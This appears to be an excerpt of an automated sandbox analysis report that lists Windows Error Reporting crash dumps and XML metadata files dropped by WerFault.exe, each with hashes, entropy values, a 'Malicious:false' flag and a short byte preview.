                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.6.1.2.<./.P.i.
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4720
                                                Entropy (8bit):4.495498441898633
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zsPJg77aI9uxWpW8VYNYm8M4JqtFQkLW+q8v2Me7Bsd:uIjfxI70g7VdJUWKu7Bsd
                                                MD5:F3D1936C176102C213845B3E37FF30CE
                                                SHA1:2C8E5EF6FF1AA134F978BFF6F579E8DBF4DFAA89
                                                SHA-256:AEFBC264E73FC8858DCDB42AFF5FAD2C2CACC91B345311A14AB64C3C4512AC66
                                                SHA-512:AD8B8AF60C448100A9F9B32FF31735350E3CC70C8C13ED439FD9B1F405079DA4D53B379B6FC930BF1CC2987D0B28D7493AE0FF6F757307AB70CA3B7C22725FF5
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670815" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat Jan 11 05:12:43 2025, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):104038
                                                Entropy (8bit):2.039930507734341
                                                Encrypted:false
                                                SSDEEP:384:1W4RmWg6m7ej7oxXAdCQlGAZs4Uj7ExK2MhHf0LEBwl9AcRQyaV:jRmWgd7S4XAdDQAZxu7wK2MhzqTiV
                                                MD5:995C3EBB010404688320EE83DB0C4A79
                                                SHA1:4349CED199888489990A4097E948645C45BCD40F
                                                SHA-256:77D627C4BAD9D89021DDA1F9486CC06B41C1ABF56EA6262A87E7C16C81CF7DE3
                                                SHA-512:1D212B1D18AF25E7A1A8B65BFF342AAEF4F052FD6EC2315302BB2A248D0649172F39A54B2AB6B6D7505EF588A54EB53F119EF41055BBE3F44F64D2950DF23AF3
                                                Malicious:false
                                                Preview:MDMP..a..... ..........g....................................t...\F..........T.......8...........T............+...j......................................................................................................eJ......x.......GenuineIntel............T.......L......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8414
                                                Entropy (8bit):3.700060520868702
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJLpu962Ue6Y2DUSU9RHSgmfppdaWpBG89bAOsfPgm:R6lXJLK6E6YJSU9RygmfpjNANfd
                                                MD5:0DAF2C1DCF1BFF0BB4C8E4DF618A123D
                                                SHA1:7EFDD15FF87FECD8A02C5E82179024E83B58E411
                                                SHA-256:A2C82DD205A78C29F620E5FDDFA9FBC12B32B34B76DB652DF3D71F5B5885C811
                                                SHA-512:A866691BBF5F44D145D85FF9107BDBD0A3538E266FBAB281E352963E0B9AD86E90F3B52B5D59D58CCD1466DC1DEA4C64594E54DED39021F6F8EEC90758F62BA3
                                                Malicious:false
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.6.1.2.<./.P.i.
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4720
                                                Entropy (8bit):4.495371140555508
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zsPJg77aI9uxWpW8VYqJYm8M4JqtFyC+q8v2Me7Bsd:uIjfxI70g7VwJ0Ku7Bsd
                                                MD5:71AAB51259B477F9490F98F8F2AF875B
                                                SHA1:784DBEE83B0ABCE6EAB382B88428786D4AB44F39
                                                SHA-256:051F87C6BA316BE34ECD35A392F09D901D2F34F2307271E7863D40427E85ACF1
                                                SHA-512:43C00872B1EDA245C32EC8494FA0774816C0C3DE64E9C09015A49C34D85E7D422C51418E28D08ECC7D7566D5F8A1931C0704F74EA0BB17BAE13B4CA91E29A8D9
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670815" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat Jan 11 05:12:44 2025, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):103614
                                                Entropy (8bit):2.0503303956664203
                                                Encrypted:false
                                                SSDEEP:384:t8q2Wgwm7+U4p9oF4A0T14lGAF4Uj7ExK2MhkF0rxWwmG2u3Fvia:f2Wgf7+UV4A0Z4QAuu7wK2MhnxK3MH
                                                MD5:20D3272749611B35E3264A6B8A87AA5B
                                                SHA1:E805C886D163CD2A6DB91916372648FDD51D085A
                                                SHA-256:F9BF78EE8CAEB1D79C75706F22797AF0009DDF967A727A6FAFF1043BB34FE383
                                                SHA-512:EAB35FC69F563D5EA7639EDCD583E047746E1E88A3E656460ECA812D33B87BEF05EEC09AA5BD0976AF02D0C166F35D2DBA8B7CBA7A4EF4DDC7055D02605DFBE5
                                                Malicious:false
                                                Preview:MDMP..a..... ..........g........................................\F..........T.......8...........T............+...h......................................................................................................eJ......x.......GenuineIntel............T.......L......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8414
                                                Entropy (8bit):3.699361286644949
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJLpuu6M6Y2DDSU9MHSgmfppdaWpB089bJOsfugmjm:R6lXJLp6M6Y+SU9MygmfpjzJNftj
                                                MD5:4904D8E8FB2357E3555AD5284AD7D6BD
                                                SHA1:EB78239811BA7555CB9019BFAE855E5850EF988B
                                                SHA-256:BC3285082A16A71FFC85C390836628E8D2D4B6ECA197DFAC1EFFB366981EDF19
                                                SHA-512:A665614A7B82CCFF005473A09AC8A303E73F05699A984B30437FD0F2CF72D2046E521F929B98531A1A2B4F917E4FAC08219ABD0814FD12F8F523CE52AA9815A4
                                                Malicious:false
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.6.1.2.<./.P.i.
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4720
                                                Entropy (8bit):4.4960008783251935
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zsPJg77aI9uxWpW8VYtPYm8M4JqtFzv+q8v2Me7Bsd:uIjfxI70g7VwSJAKu7Bsd
                                                MD5:01942366E3EB92115B2429595A4AE298
                                                SHA1:1A23B3FAC6CE126025FC5D7F5B63194EB94A2BDE
                                                SHA-256:FF55BC6AC259CD4A1F3D90FCACCAF76F38A72438618BC3B343B97F2E6AD10E77
                                                SHA-512:6688EAFC5AEDBBC7CA59B74A5382218A4F2DCEA920518F61DEFE3610288527E89658C95A4CF22FEE69C41604815EEC4BE096A76A1A83156B2AD301FCF995B2CF
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670815" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat Jan 11 05:12:45 2025, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):112404
                                                Entropy (8bit):2.214911743334178
                                                Encrypted:false
                                                SSDEEP:768:xWg37v24A04iO64SlQAsfq7wK2Mhx48NQ:oGA0xO64SCnq7wc+WQ
                                                MD5:7B9DBB79BAB37C99AC03B9B03884D830
                                                SHA1:133187FA5771F0301870CFEA3852F34F1B67675E
                                                SHA-256:12399E446D82E7584450ADFDF576A2A0BBC135911991BE341C0D3B61BF063891
                                                SHA-512:DB0777FA2D7CCF68C76159E598B06605BD50C3F882148BBE53F318E00C5997A220A646B83883417E6FE7E0EBC0ABA822D09307FE531F2823EF33A1DCAF4A3AEA
                                                Malicious:false
                                                Preview:MDMP..a..... ..........g........................................\F..........T.......8...........T............-..........................................................................................................eJ......x.......GenuineIntel............T.......L......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8414
                                                Entropy (8bit):3.6990182772830558
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJLpu46tq6Y2DMSU9MHSgmfppdaWpBT89bJOsf+Ljm:R6lXJLf6tq6YxSU9MygmfpjGJNfn
                                                MD5:04E1D174FD926615CCBDBA41D473F3E8
                                                SHA1:1672DF6D339719B74142FDDC429596198B659F9F
                                                SHA-256:F5AF36B0EFC34BB59BBBC93B2FC6C490CCA9A8AB091A881E638A666DAD50862D
                                                SHA-512:7C733E44499A3535D325965DF2C6C9DA7BB8D005E57300C207773DF2FD30318EDE4424BC5BA053AF472BBFF31B9044840A2A4DB707894BFA00D4291D0C8DD0C0
                                                Malicious:false
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.6.1.2.<./.P.i.
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4720
                                                Entropy (8bit):4.4937417346332165
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zsPJg77aI9uxWpW8VYjvYm8M4JqtFtEp+q8v2Me7Bsd:uIjfxI70g7V3JSEpKu7Bsd
                                                MD5:4AB1131E06C8F12B6D8412C177BCEC8D
                                                SHA1:B16DF7871616B77FEAA1168206AC1E1BCFC456AF
                                                SHA-256:285A39536D0FF2F0C1B5CC8B18E3B8A8E0194BF39A8BA7483926CA90EAB2679A
                                                SHA-512:ED5E9F696842F14840330AE7B1A22C5DF34AE97B47708B5A4B55FA6D8C7AAE7A7309B22C5AF3C89D4962AFD2137890E57EB7A899969C0BC1198B129A6FB21BD4
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670815" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat Jan 11 05:12:47 2025, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):42380
                                                Entropy (8bit):2.732038951321124
                                                Encrypted:false
                                                SSDEEP:192:CMP8XDXYywJX/b9CtDzpROmlUt2kIBgTMG81AN2M/Hx7pjok1lJYafhwlxmxTC3K:bywVb4Bzm71IBOMxK2MfhYjx8TSi9
                                                MD5:8039C00908EF53768DBC2948F8C48DE6
                                                SHA1:9BAA92E3412B04317BF81C3FCAE8A43DD925F018
                                                SHA-256:8933DDB67E5F7B2F6E6FC1A95C77E7B154F158426D6FACDF90C630A276D58ACA
                                                SHA-512:36E9906DD39986DEA31A5424EBD7BF29194AB2A58047A6C51276F5FDE2568039C51E4DEF88EE06FF8529426B442D0D42D68EA93C04C61B02D9317018F429CA10
                                                Malicious:false
                                                Preview:MDMP..a..... ..........g............4...............<...........<...........T.......8...........T...........p1...t..........L...........8!..............................................................................eJ.......!......GenuineIntel............T.......L......g.............................0..............,...E.a.s.t.e.r.n. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................E.a.s.t.e.r.n. .S.u.m.m.e.r. .T.i.m.e...............................................1.9.0.4.1...1...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6...................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8316
                                                Entropy (8bit):3.6954953522164913
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJLpuX6IJC6Y2DgOSU9RHwgmfMpophxWpD+89b7OsfHPJm:R6lXJLY6IJC6Y1OSU9RQgmfM2vK7NfHc
                                                MD5:3A282029DD47C6936BFEEC306B04A831
                                                SHA1:41DEAF7838B5B4CE23744D27530AC9A7B360D6CA
                                                SHA-256:2E135D8C4D41FB58DAB8758D2EDB379A7794D5867300434A984DEF57DB21DF37
                                                SHA-512:2EC61B03AE927BF491AAD489E8DC644B89BA3B035BB0E48C168DBCC7A2A536160CCDFC72B4AC60C61F520C6183C901E4CD0C0922A77D7E178D90ACAC08DE55E5
                                                Malicious:false
                                                Preview:..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.9.0.4.5.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.9.0.4.1...2.0.0.6...a.m.d.6.4.f.r.e...v.b._.r.e.l.e.a.s.e...1.9.1.2.0.6.-.1.4.0.6.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.2.0.0.6.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.2.0.5.7.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.6.1.2.<./.P.i.
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4579
                                                Entropy (8bit):4.479985360022542
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zsPJg77aI9uxWpW8VYoYm8M4JqPFt+q8CEe7Bsd:uIjfxI70g7VoJMt7Bsd
                                                MD5:25CAEE5052FB18969BF8C7A8B91BDFBD
                                                SHA1:76CA124881E32E8AD33443DAA7C9C9AE20BDB252
                                                SHA-256:1945FCB8F7D312D7AE3F29D28181E19781F6E99BB71109F6FAD8622770933F7F
                                                SHA-512:DDC691263B8FF3A02805457A1B8B52457E5A9E52F69B13331BD53BFE075DE38A1598055BD4EE82683D10C605E06D7224989B58029089F40278EC3220C32003AF
                                                Malicious:false
                                                Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="19045" />.. <arg nm="vercsdbld" val="2006" />.. <arg nm="verqfe" val="2006" />.. <arg nm="csdbld" val="2006" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="2057" />.. <arg nm="geoid" val="223" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="670815" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.789.19041.0-11.0.1000" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="409
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Mini DuMP crash report, 14 streams, Sat Jan 11 05:12:48 2025, 0x1205a4 type
                                                Category:dropped
                                                Size (bytes):62046
                                                Entropy (8bit):2.2027203591895597
                                                Encrypted:false
                                                SSDEEP:384:QsucehtgeAxalpZ5D/+j2Mh0PlelqKQcDaRq:xuLhtgezyj2MqElqr
                                                MD5:44A4D7029E6AF907FFB16E120474BAF6
                                                SHA1:7AB008EC96A927B6241891F80A87B58B42051CD7
                                                SHA-256:FB961C23891DF8D79C06928405F975A4017D083632D9A8FD87B557B7E3507B1D
                                                SHA-512:C1CF238BA6A5556C73F3572FD879CB2B1BEE5808C75162D02C1CBA81A100D2C60BA0CDAF7E927E6330EB3763EE6075CECF4C40163C5EA4D072D3C94F7CC0E8ED
                                                Malicious:false
                                                Preview (binary minidump; non-printable bytes omitted):MDMP header, then the printable strings GenuineIntel, Eastern Standard Time, Eastern Summer Time and the OS build string 19041.1.amd64fre.vb_release.191206-1406 (the last three UTF-16 encoded), followed by a long run of non-printable bytes
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):8396
                                                Entropy (8bit):3.6966883208192196
                                                Encrypted:false
                                                SSDEEP:192:R6l7wVeJ2L6RpJW6Yrpud6ARqgmfKaWpBp89bcLqsfxAUm:R6lXJa6RpI6YrC6ARqgmfKEcLJfA
                                                MD5:ACB52C2C30AB48F1ADC24BEA30B0A2D8
                                                SHA1:03B202DEC6167710B966AFEF81BAD414D18E3031
                                                SHA-256:EA9BDB1A58F16FCEFDF4ED03BD365BBA0B24B6D4E0CB023958FED124A6DBF5E1
                                                SHA-512:F72049E26AC0E8D2A59036C2A2D6A196B8C0326548EDBFFB691C62AF44AD13122D5C7C4F2B86183E6C5A4EE56A5704A236EB9E58962700E7EA6FF488DB8196FF
                                                Malicious:false
                                                Preview (UTF-16LE text with BOM, decoded; CRLF and tab indentation collapsed to single spaces):<?xml version="1.0" encoding="UTF-16"?> <WERReportMetadata> <OSVersionInformation> <WindowsNTVersion>10.0</WindowsNTVersion> <Build>19045</Build> <Product>(0x30): Windows 10 Pro</Product> <Edition>Professional</Edition> <BuildString>19041.2006.amd64fre.vb_release.191206-1406</BuildString> <Revision>2006</Revision> <Flavor>Multiprocessor Free</Flavor> <Architecture>X64</Architecture> <LCID>2057</LCID> </OSVersionInformation> <ProcessInformation> <Pid>1512</Pi
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):4720
                                                Entropy (8bit):4.466974052709908
                                                Encrypted:false
                                                SSDEEP:48:cvIwWl8zsPJg77aI9uxWpW8VY2Ym8M4JStF3+q8vzk38Rqhd:uIjfxI70g7V6JMKw38Rqhd
                                                MD5:A47AEA88E628C606C0E5FC8245E5595A
                                                SHA1:BB161C6E2D260CFACFE6E8FCC275D3B1B7277F53
                                                SHA-256:9B0B1221CB562B7D8271F8464D4323C060949EDF7B006E05196ED4FEBF6545D1
